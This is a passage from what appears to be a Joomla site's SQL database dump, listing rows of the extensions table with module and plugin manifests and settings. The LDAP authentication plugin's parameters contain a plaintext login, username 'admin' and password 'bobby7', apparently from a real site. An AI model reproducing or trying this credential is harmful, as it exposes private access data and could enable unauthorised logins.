2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_menu\"}','','','',0,'0000-00-00 00:00:00',0,0),(210,0,'mod_articles_news','module','mod_articles_news','',0,1,1,0,'{\"name\":\"mod_articles_news\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_NEWS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_news\"}','','','',0,'0000-00-00 00:00:00',0,0),(211,0,'mod_random_image','module','mod_random_image','',0,1,1,0,'{\"name\":\"mod_random_image\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_RANDOM_IMAGE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_random_image\"}','','','',0,'0000-00-00 00:00:00',0,0),(212,0,'mod_related_items','module','mod_related_items','',0,1,1,0,'{\"name\":\"mod_related_items\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_RELATED_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_related_items\"}','','','',0,'0000-00-00 00:00:00',0,0),(213,0,'mod_search','module','mod_search','',0,1,1,0,'{\"name\":\"mod_search\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SEARCH_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_search\"}','','','',0,'0000-00-00 00:00:00',0,0),(214,0,'mod_stats','module','mod_stats','',0,1,1,0,'{\"name\":\"mod_stats\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_stats\"}','','','',0,'0000-00-00 00:00:00',0,0),(215,0,'mod_syndicate','module','mod_syndicate','',0,1,1,1,'{\"name\":\"mod_syndicate\",\"type\":\"module\",\"creationDate\":\"May 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SYNDICATE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_syndicate\"}','','','',0,'0000-00-00 00:00:00',0,0),(216,0,'mod_users_latest','module','mod_users_latest','',0,1,1,0,'{\"name\":\"mod_users_latest\",\"type\":\"module\",\"creationDate\":\"December 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2009 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_USERS_LATEST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_users_latest\"}','','','',0,'0000-00-00 00:00:00',0,0),(217,801,'mod_weblinks','module','mod_weblinks','',0,1,1,0,'{\"name\":\"mod_weblinks\",\"type\":\"module\",\"creationDate\":\"2021-09-19\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2017 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"MOD_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_weblinks\"}','','','',0,'0000-00-00 00:00:00',0,0),(218,0,'mod_whosonline','module','mod_whosonline','',0,1,1,0,'{\"name\":\"mod_whosonline\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_WHOSONLINE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_whosonline\"}','','','',0,'0000-00-00 00:00:00',0,0),(219,0,'mod_wrapper','module','mod_wrapper','',0,1,1,0,'{\"name\":\"mod_wrapper\",\"type\":\"module\",\"creationDate\":\"October 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_WRAPPER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_wrapper\"}','','','',0,'0000-00-00 00:00:00',0,0),(220,0,'mod_articles_category','module','mod_articles_category','',0,1,1,0,'{\"name\":\"mod_articles_category\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2010 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_CATEGORY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_category\"}','','','',0,'0000-00-00 00:00:00',0,0),(221,0,'mod_articles_categories','module','mod_articles_categories','',0,1,1,0,'{\"name\":\"mod_articles_categories\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2010 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_categories\"}','','','',0,'0000-00-00 00:00:00',0,0),(222,0,'mod_languages','module','mod_languages','',0,1,1,1,'{\"name\":\"mod_languages\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2010 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.5.0\",\"description\":\"MOD_LANGUAGES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_languages\"}','','','',0,'0000-00-00 00:00:00',0,0),(223,0,'mod_finder','module','mod_finder','',0,1,0,0,'{\"name\":\"mod_finder\",\"type\":\"module\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FINDER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_finder\"}','','','',0,'0000-00-00 00:00:00',0,0),(300,0,'mod_custom','module','mod_custom','',1,1,1,1,'{\"name\":\"mod_custom\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_CUSTOM_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_custom\"}','','','',0,'0000-00-00 00:00:00',0,0),(301,0,'mod_feed','module','mod_feed','',1,1,1,0,'{\"name\":\"mod_feed\",\"type\":\"module\",\"creationDate\":\"July 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FEED_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_feed\"}','','','',0,'0000-00-00 00:00:00',0,0),(302,0,'mod_latest','module','mod_latest','',1,1,1,0,'{\"name\":\"mod_latest\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LATEST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_latest\"}','','','',0,'0000-00-00 00:00:00',0,0),(303,0,'mod_logged','module','mod_logged','',1,1,1,0,'{\"name\":\"mod_logged\",\"type\":\"module\",\"creationDate\":\"January 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGGED_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_logged\"}','','','',0,'0000-00-00 00:00:00',0,0),(304,0,'mod_login','module','mod_login','',1,1,1,1,'{\"name\":\"mod_login\",\"type\":\"module\",\"creationDate\":\"March 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_login\"}','','','',0,'0000-00-00 00:00:00',0,0),(305,0,'mod_menu','module','mod_menu','',1,1,1,0,'{\"name\":\"mod_menu\",\"type\":\"module\",\"creationDate\":\"March 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_menu\"}','','','',0,'0000-00-00 00:00:00',0,0),(307,0,'mod_popular','module','mod_popular','',1,1,1,0,'{\"name\":\"mod_popular\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_POPULAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_popular\"}','','','',0,'0000-00-00 00:00:00',0,0),(308,0,'mod_quickicon','module','mod_quickicon','',1,1,1,1,'{\"name\":\"mod_quickicon\",\"type\":\"module\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_QUICKICON_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_quickicon\"}','','','',0,'0000-00-00 00:00:00',0,0),(309,0,'mod_status','module','mod_status','',1,1,1,0,'{\"name\":\"mod_status\",\"type\":\"module\",\"creationDate\":\"February 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATUS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_status\"}','','','',0,'0000-00-00 00:00:00',0,0),(310,0,'mod_submenu','module','mod_submenu','',1,1,1,0,'{\"name\":\"mod_submenu\",\"type\":\"module\",\"creationDate\":\"February 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SUBMENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_submenu\"}','','','',0,'0000-00-00 00:00:00',0,0),(311,0,'mod_title','module','mod_title','',1,1,1,0,'{\"name\":\"mod_title\",\"type\":\"module\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_TITLE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_title\"}','','','',0,'0000-00-00 00:00:00',0,0),(312,0,'mod_toolbar','module','mod_toolbar','',1,1,1,1,'{\"name\":\"mod_toolbar\",\"type\":\"module\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_TOOLBAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_toolbar\"}','','','',0,'0000-00-00 00:00:00',0,0),(313,0,'mod_multilangstatus','module','mod_multilangstatus','',1,1,1,0,'{\"name\":\"mod_multilangstatus\",\"type\":\"module\",\"creationDate\":\"September 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MULTILANGSTATUS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_multilangstatus\"}','{\"cache\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(314,0,'mod_version','module','mod_version','',1,1,1,0,'{\"name\":\"mod_version\",\"type\":\"module\",\"creationDate\":\"January 2012\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2012 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_VERSION_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_version\"}','{\"format\":\"short\",\"product\":\"1\",\"cache\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(315,0,'mod_stats_admin','module','mod_stats_admin','',1,1,1,0,'{\"name\":\"mod_stats_admin\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_stats_admin\"}','{\"serverinfo\":\"0\",\"siteinfo\":\"0\",\"counter\":\"0\",\"increase\":\"0\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}','','',0,'0000-00-00 00:00:00',0,0),(316,0,'mod_tags_popular','module','mod_tags_popular','',0,1,1,0,'{\"name\":\"mod_tags_popular\",\"type\":\"module\",\"creationDate\":\"January 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2013 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"MOD_TAGS_POPULAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_tags_popular\"}','{\"maximum\":\"5\",\"timeframe\":\"alltime\",\"owncache\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(317,0,'mod_tags_similar','module','mod_tags_similar','',0,1,1,0,'{\"name\":\"mod_tags_similar\",\"type\":\"module\",\"creationDate\":\"January 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2013 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"MOD_TAGS_SIMILAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_tags_similar\"}','{\"maximum\":\"5\",\"matchtype\":\"any\",\"owncache\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(318,0,'mod_sampledata','module','mod_sampledata','',1,1,1,0,'{\"name\":\"mod_sampledata\",\"type\":\"module\",\"creationDate\":\"July 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2017 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.8.0\",\"description\":\"MOD_SAMPLEDATA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_sampledata\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(319,0,'mod_latestactions','module','mod_latestactions','',1,1,1,0,'{\"name\":\"mod_latestactions\",\"type\":\"module\",\"creationDate\":\"May 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"MOD_LATESTACTIONS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_latestactions\"}','{}','','',0,'1970-01-01 00:00:00',0,0),(320,0,'mod_privacy_dashboard','module','mod_privacy_dashboard','',1,1,1,0,'{\"name\":\"mod_privacy_dashboard\",\"type\":\"module\",\"creationDate\":\"June 2018\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2018 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"MOD_PRIVACY_DASHBOARD_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_privacy_dashboard\"}','{}','','',0,'1970-01-01 00:00:00',0,0),(400,0,'plg_authentication_gmail','plugin','gmail','authentication',0,0,1,0,'{\"name\":\"plg_authentication_gmail\",\"type\":\"plugin\",\"creationDate\":\"February 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_GMAIL_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"gmail\"}','{\"applysuffix\":\"0\",\"suffix\":\"\",\"verifypeer\":\"1\",\"user_blacklist\":\"\"}','','',0,'0000-00-00 00:00:00',1,0),(401,0,'plg_authentication_joomla','plugin','joomla','authentication',0,1,1,1,'{\"name\":\"plg_authentication_joomla\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_AUTH_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(402,0,'plg_authentication_ldap','plugin','ldap','authentication',0,0,1,0,'{\"name\":\"plg_authentication_ldap\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LDAP_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"ldap\"}','{\"host\":\"\",\"port\":\"389\",\"use_ldapV3\":\"0\",\"negotiate_tls\":\"0\",\"no_referrals\":\"0\",\"auth_method\":\"bind\",\"base_dn\":\"\",\"search_string\":\"\",\"users_dn\":\"\",\"username\":\"admin\",\"password\":\"bobby7\",\"ldap_fullname\":\"fullName\",\"ldap_email\":\"mail\",\"ldap_uid\":\"uid\"}','','',0,'0000-00-00 00:00:00',3,0),(403,0,'plg_content_contact','plugin','contact','content',0,1,1,0,'{\"name\":\"plg_content_contact\",\"type\":\"plugin\",\"creationDate\":\"January 2014\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2014 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.2\",\"description\":\"PLG_CONTENT_CONTACT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contact\"}','','','',62,'2019-05-03 09:43:41',1,0),(404,0,'plg_content_emailcloak','plugin','emailcloak','content',0,1,1,0,'{\"name\":\"plg_content_emailcloak\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_EMAILCLOAK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"emailcloak\"}','{\"mode\":\"1\"}','','',0,'0000-00-00 00:00:00',1,0),(405,0,'plg_content_geshi','plugin','geshi','content',0,0,1,0,'{\"name\":\"plg_content_geshi\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"qbnz.com\\/highlighter\",\"version\":\"2.5.0\",\"description\":\"PLG_CONTENT_GESHI_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"geshi\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(406,0,'plg_content_loadmodule','plugin','loadmodule','content',0,1,1,0,'{\"name\":\"plg_content_loadmodule\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LOADMODULE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"loadmodule\"}','{\"style\":\"xhtml\"}','','',0,'2011-09-18 15:22:50',0,0),(407,0,'plg_content_pagebreak','plugin','pagebreak','content',0,1,1,0,'{\"name\":\"plg_content_pagebreak\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_PAGEBREAK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"pagebreak\"}','{\"title\":\"1\",\"multipage_toc\":\"1\",\"showall\":\"1\"}','','',0,'0000-00-00 00:00:00',4,0),(408,0,'plg_content_pagenavigation','plugin','pagenavigation','content',0,1,1,0,'{\"name\":\"plg_content_pagenavigation\",\"type\":\"plugin\",\"creationDate\":\"January 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_PAGENAVIGATION_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"pagenavigation\"}','{\"position\":\"1\"}','','',0,'0000-00-00 00:00:00',5,0),(409,0,'plg_content_vote','plugin','vote','content',0,1,1,0,'{\"name\":\"plg_content_vote\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_VOTE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"vote\"}','{}','','',0,'0000-00-00 00:00:00',6,0),(410,0,'plg_editors_codemirror','plugin','codemirror','editors',0,1,1,1,'{\"name\":\"plg_editors_codemirror\",\"type\":\"plugin\",\"creationDate\":\"28 March 2011\",\"author\":\"Marijn Haverbeke\",\"copyright\":\"Copyright (C) 2014 - 2021 by Marijn Haverbeke <marijnh@gmail.com> and others\",\"authorEmail\":\"marijnh@gmail.com\",\"authorUrl\":\"https:\\/\\/codemirror.net\\/\",\"version\":\"5.60.0\",\"description\":\"PLG_CODEMIRROR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"codemirror\"}','{\"lineNumbers\":\"1\",\"lineWrapping\":\"1\",\"matchTags\":\"1\",\"matchBrackets\":\"1\",\"marker-gutter\":\"1\",\"autoCloseTags\":\"1\",\"autoCloseBrackets\":\"1\",\"autoFocus\":\"1\",\"theme\":\"default\",\"tabmode\":\"indent\"}','','',0,'0000-00-00 00:00:00',1,0),(411,0,'plg_editors_none','plugin','none','editors',0,1,1,1,'{\"name\":\"plg_editors_none\",\"type\":\"plugin\",\"creationDate\":\"September 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_NONE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"none\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(412,0,'plg_editors_tinymce','plugin','tinymce','editors',0,1,1,0,'{\"name\":\"plg_editors_tinymce\",\"type\":\"plugin\",\"creationDate\":\"2005-2020\",\"author\":\"Tiny Technologies, Inc\",\"copyright\":\"Tiny Technologies, Inc\",\"authorEmail\":\"N\\/A\",\"authorUrl\":\"https:\\/\\/www.tiny.cloud\",\"version\":\"4.5.12\",\"description\":\"PLG_TINY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"tinymce\"}','{\"skin\":\"0\",\"skin_admin\":\"0\",\"mode\":\"2\",\"mobile\":\"0\",\"entity_encoding\":\"raw\",\"lang_mode\":\"0\",\"lang_code\":\"ru\",\"text_direction\":\"ltr\",\"content_css\":\"1\",\"content_css_custom\":\"\",\"relative_urls\":\"1\",\"newlines\":\"0\",\"invalid_elements\":\"script,applet\",\"valid_elements\":\"\",\"extended_elements\":\"\",\"html_height\":\"550\",\"html_width\":\"750\",\"resizing\":\"1\",\"resize_horizontal\":\"1\",\"element_path\":\"1\",\"fonts\":\"1\",\"paste\":\"1\",\"searchreplace\":\"1\",\"insertdate\":\"1\",\"colors\":\"1\",\"table\":\"1\",\"smilies\":\"1\",\"hr\":\"1\",\"link\":\"1\",\"media\":\"1\",\"print\":\"1\",\"directionality\":\"1\",\"fullscreen\":\"1\",\"alignment\":\"1\",\"visualchars\":\"1\",\"visualblocks\":\"1\",\"nonbreaking\":\"1\",\"template\":\"1\",\"blockquote\":\"1\",\"wordcount\":\"1\",\"image_advtab\":\"1\",\"advlist\":\"1\",\"autosave\":\"1\",\"contextmenu\":\"1\",\"inlinepopups\":\"1\",\"custom_plugin\":\"\",\"custom_button\":\"\"}','','',0,'0000-00-00 00:00:00',3,0),(413,0,'plg_editors-xtd_article','plugin','article','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_article\",\"type\":\"plugin\",\"creationDate\":\"October 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2009 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_ARTICLE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"article\"}','{}','','',0,'0000-00-00 00:00:00',1,0),(414,0,'plg_editors-xtd_image','plugin','image','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_image\",\"type\":\"plugin\",\"creationDate\":\"August 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_IMAGE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"image\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(415,0,'plg_editors-xtd_pagebreak','plugin','pagebreak','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_pagebreak\",\"type\":\"plugin\",\"creationDate\":\"August 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_EDITORSXTD_PAGEBREAK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"pagebreak\"}','{}','','',0,'0000-00-00 00:00:00',3,0),(416,0,'plg_editors-xtd_readmore','plugin','readmore','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_readmore\",\"type\":\"plugin\",\"creationDate\":\"March 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_READMORE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"readmore\"}','{}','','',0,'0000-00-00 00:00:00',4,0),(417,0,'plg_search_categories','plugin','categories','search',0,1,1,0,'{\"name\":\"plg_search_categories\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, 